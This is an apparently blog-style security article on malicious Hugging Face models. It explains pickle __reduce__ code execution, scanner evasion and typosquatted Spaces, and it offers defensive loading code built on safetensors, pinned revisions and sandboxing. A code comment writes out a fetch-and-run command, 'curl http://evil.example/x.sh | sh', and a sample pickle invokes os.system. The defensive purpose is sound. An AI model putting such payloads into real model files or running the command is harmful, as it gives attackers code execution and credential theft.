In April 2026, a typosquatted Hugging Face Space called vsccode-modetx started serving a Go-based backdoor that used the NKN blockchain for command-and-control, disguising the binary as a Kubernetes agent named kagent. The underlying flaw, tracked as CVE-2026-39987, gave unauthenticated attackers a full interactive shell on the host that loaded the model. According to Cyberpress's reporting, first active exploitation was logged less than 10 hours after the advisory was published, and over a three-day window attackers from roughly a dozen IP addresses across multiple countries fired hundreds of exploit events. One operator used the foothold to extract AWS access keys, Postgres connection strings, and OpenAI API tokens from environment variables on data-science workstations.
This is the third widely reported round of AI supply-chain takedowns on Hugging Face since 2024. In 2024, ReversingLabs found malicious models smuggled in via pickle deserialization. In early 2025, JFrog flagged more than 100 malicious code-execution models. In 2026, the attackers moved up the stack to typosquatted Spaces with blockchain-routed C2.
If you load models from Hugging Face into a Python process, you are running their code on your machine. Worth knowing what shape that code arrives in, and how to load weights without giving an attacker your laptop.
The three attack shapes that keep working
There are three primary paths and they have not changed much in two years.
Pickle injection in .bin and .pt files. PyTorch's default save format wraps weights in Python's pickle module. Pickle's load step executes arbitrary Python. Attackers override the __reduce__ method on a custom class so that torch.load() runs an arbitrary Python payload as a side effect of "deserializing" the model. JFrog's 2024 analysis found that around 95% of malicious models on Hugging Face are PyTorch pickle files, and roughly 5% are TensorFlow Keras. The payload is whatever the attacker wants: a reverse shell, an exfiltration script, a cryptominer.
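To make the mechanic concrete, here is a minimal sketch with a harmless payload standing in for a real one; loading the blob is what triggers execution:

```python
import pickle

class Payload:
    def __reduce__(self):
        # pickle records the result of __reduce__ at dump time; at load
        # time it calls the returned callable with the returned args.
        # A real attacker returns something like
        # (os.system, ("curl http://evil.example/x.sh | sh",)).
        return (print, ("arbitrary code ran during deserialization",))

blob = pickle.dumps(Payload())
pickle.loads(blob)  # prints the message: loading is executing
```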
Pickle scanner evasion. Hugging Face runs PickleScan to flag dangerous opcodes in pickle files. Researchers have shown that the scanner can be evaded by using broken or malformed pickle streams that the scanner refuses to parse but torch.load() will still happily execute. JFrog disclosed three zero-days in PickleScan that were fixed in version 0.0.31 in September 2025. Earlier in 2025 The Hacker News covered a separate broken-pickle bypass. The scanner is part of the defense; it is not a guarantee.
Typosquatted Spaces with embedded RCE. The newest shape. The attacker publishes a Hugging Face Space whose name is a one-character variation on a popular tool. Users land on the Space looking for the legitimate version, run the install snippet, and the snippet pulls a binary that opens a backdoor. The April 2026 wave used this pattern with a blockchain-routed C2 channel that survives takedowns of any single command server.
Adjacent shapes show up less often: weight-poisoning attacks where the model is trained to behave maliciously on a trigger phrase, and watermark-exfiltration where a fine-tune leaks training data through structured output. Both real, both rarer than pickle injection by orders of magnitude.
What Hugging Face has been doing about it
Three layers of response, in increasing order of how much you should rely on them.
PickleScan, since 2023. Static analysis of pickle opcodes at upload time. Flags posix.system, subprocess.Popen, eval, exec, and the rest. Useful as a coarse filter. Demonstrably bypassable.
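For a sense of what opcode-level scanning looks at, Python's standard pickletools can disassemble a malicious blob without executing it. The class below is illustrative, and the blob is never loaded:

```python
import os
import pickle
import pickletools

class Evil:
    def __reduce__(self):
        return (os.system, ("echo pwned",))

blob = pickle.dumps(Evil())
# dis() prints the opcode stream a static scanner inspects: a
# STACK_GLOBAL opcode resolving os.system (posix.system on Linux),
# then REDUCE. Nothing runs, because we never call pickle.loads(blob).
pickletools.dis(blob)
```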
Partnership with security vendors, since 2024. JFrog and Hugging Face joined forces to scan uploaded models with deeper tooling and take down malicious ones. Takedown rounds are now routine; the dozens flagged in the April 2026 batch are part of a continuous pipeline rather than a one-time event.
Promotion of safetensors as the default format. Safetensors is a serialization format that stores tensors as raw bytes plus a JSON header. No Python objects, no pickle, no __reduce__. Independent security audits have validated the format. Hugging Face flips repos to safetensors-default whenever possible. The catch: a large share of Hugging Face repositories still contain pickle models, because old models exist and conversion is not free.
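A quick sketch of what that buys you in practice: a round trip is pure tensor I/O, with no code path that can construct arbitrary Python objects:

```python
import torch
from safetensors.torch import load_file, save_file

# Save: raw tensor bytes plus a JSON header of names, dtypes, shapes.
save_file({"embedding.weight": torch.zeros((10, 4))}, "model.safetensors")

# Load: parse the header, map the bytes back into tensors. No pickle,
# no __reduce__, no object construction beyond tensors.
tensors = load_file("model.safetensors")
assert tensors["embedding.weight"].shape == (10, 4)
```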
The platform's defenses help. They do not absolve you of running unknown code on your hardware.
The defensive practices that matter
Six things, in priority order:
- Prefer safetensors. When you choose between two model artifacts and one is .safetensors, take it. When the only option is .bin or .pt, decide whether you trust the publisher.
- Pin to a specific commit hash. Hugging Face exposes a revision argument on every load function. A commit hash is immutable; a tag is not. If a maintainer's account is compromised, your pinned revision is unaffected.
- Run model loads in a sandbox. A short-lived container, a firejail or bubblewrap profile, a separate user account. The attacker's payload runs as the loading process; constrain that process.
- Strip credentials from the loading environment. No AWS profile, no OPENAI_API_KEY, no Postgres connection string in the env of the process that calls torch.load(). The April 2026 incident was specifically about credential exfil from env vars.
- Use weights_only=True for torch.load. PyTorch 2.6 made weights_only=True the default; on 2.4 and 2.5 you have to pass it explicitly. It refuses to deserialize anything that is not a tensor or a small allowlist of types. A meaningful step: it doesn't catch every shape, but it breaks the most common pickle-RCE path (a sketch combining this with commit pinning follows the list).
- Scan files before load. Run picklescan and modelscan over downloaded artifacts. Treat any flag as a hard stop. False positives happen; sort them out before, not during, a load.
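Here is the promised sketch of commit pinning and weights_only together; the repo name, filename, and hash are placeholders:

```python
import torch
from huggingface_hub import hf_hub_download

# Pin to an immutable commit hash, never "main" or a tag.
path = hf_hub_download(
    repo_id="someorg/some-model",   # placeholder repo
    filename="pytorch_model.bin",   # legacy pickle-based format
    revision="a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0",  # full commit hash
)

# weights_only=True restricts unpickling to tensors and a small
# allowlist of types. Default since PyTorch 2.6; pass it explicitly
# on 2.4 and 2.5.
state_dict = torch.load(path, map_location="cpu", weights_only=True)
```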
A 20-line restricted loader
Python. Loads weights from safetensors only, refuses pickle, and is designed to run as its own locked-down process (container notes below). Use it as a wrapper around any unverified model.
```python
import os, sys
from pathlib import Path

from huggingface_hub import hf_hub_download
from safetensors.torch import load_file


def load_safe(repo: str, filename: str, revision: str):
    # Refuse anything that is not safetensors: no fallback to pickle.
    if not filename.endswith(".safetensors"):
        raise ValueError("safetensors only; refuse pickle")
    path = hf_hub_download(
        repo_id=repo, filename=filename, revision=revision
    )
    # safetensors format: bytes 0-7 are the JSON header length as little-endian u64
    head = Path(path).read_bytes()[:8]
    if int.from_bytes(head, "little") > 100_000_000:
        raise ValueError("header too large; suspicious file")
    return load_file(path, device="cpu")


if __name__ == "__main__":
    # Pop the most-targeted credentials before anything is downloaded or loaded.
    for var in ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY",
                "OPENAI_API_KEY", "DATABASE_URL", "PGPASSWORD"):
        os.environ.pop(var, None)
    weights = load_safe(
        repo=sys.argv[1],
        filename=sys.argv[2],
        revision=sys.argv[3],  # full commit hash, not a tag
    )
    print(f"loaded {len(weights)} tensors")
```
Four properties worth naming. The function refuses anything that is not a .safetensors file at the filename level, with no fallback to pickle. It validates the safetensors header length, so a malformed file claiming a 2GB header cannot push the loader into a bad allocation. It pins to a revision argument that you must pass as a full commit hash, not a tag. And it pops the most-targeted credential env vars before the load, so the loaded code cannot exfiltrate them through os.environ.
For real isolation, run this script inside a container with --read-only, --cap-drop=ALL, and --network=none (or a network policy that only reaches Hugging Face), then mount the output tensor file out. The loader becomes the trust boundary; whatever happens inside it cannot reach the rest of your environment.
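For illustration, a launcher along these lines pins those flags from Python; the image name, mount paths, and script location are placeholders, and a plain docker run with the same flags works just as well:

```python
import subprocess

def run_loader_in_container(repo: str, filename: str, revision: str) -> None:
    subprocess.run(
        [
            "docker", "run", "--rm",
            "--read-only",       # no writes to the container filesystem
            "--cap-drop=ALL",    # drop every Linux capability
            "--network=none",    # nothing for a payload to phone home to
            "-v", "./cache:/cache:ro",  # pre-downloaded artifacts, read-only
            "-v", "./out:/out",         # the only writable mount: tensor output
            "loader-image:latest",      # placeholder image with the loader baked in
            "python", "/app/load_safe.py", repo, filename, revision,
        ],
        check=True,
    )
```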
What this means for agent stacks
Agents that load models from registries are the most exposed shape. The agent calls a tool that downloads a model. The model carries a payload. The payload runs with the agent's permissions, which usually include the agent's tool credentials, which usually include API tokens for everything the agent can touch.
Two practices that compose well with the loader above:
- Treat model loading as a tool call, not an import. Route every model download through a single function with the safe-load contract. Audit log every call. No from_pretrained() strewn across your codebase. (A sketch follows this list.)
- Separate the loading process from the inference process. Load weights in a sandboxed worker. Hand the loaded weights to a long-running inference process via shared memory or a serialized handoff. The inference process never deserializes pickle.
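A sketch of the first practice, reusing the load_safe function from the loader above (assumed importable or in scope); the logger setup is illustrative:

```python
import logging

audit = logging.getLogger("model_loads")
logging.basicConfig(level=logging.INFO)

def load_model_tool(repo: str, filename: str, revision: str):
    """The single entry point agents are allowed to call for model loads.

    Every download goes through the safe-load contract and leaves an
    audit trail; nothing else in the codebase calls from_pretrained()
    or torch.load() directly.
    """
    audit.info("model_load repo=%s file=%s revision=%s",
               repo, filename, revision)
    return load_safe(repo, filename, revision)  # restricted loader from above
```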
These practices also cover the separate case of a maintainer's account being compromised mid-week. Pinned revision plus restricted loader plus sandboxed worker means a hostile push to main does not become a hostile execution on your hardware.
The closer
The underlying mechanic is the same pickle problem the community has been talking about for three years. Safetensors solves the first attack class. Sandboxing and credential hygiene solve the rest. Both are work. Both are cheaper than the postmortem you write after an OPENAI_API_KEY leaks from a research workstation at 2 AM.
If this was useful
Most agent vulnerabilities are not novel attacks on the model. They are old supply-chain attacks routed through new package ecosystems. The AI Agents Pocket Guide covers the patterns for sandboxing tool execution and isolating high-risk operations like model loading. If your agents write or read prompts that ride near user input, the Prompt Engineering Pocket Guide covers the prompt-injection adjacent class — different attack surface, same mindset of trusting nothing the model touches.

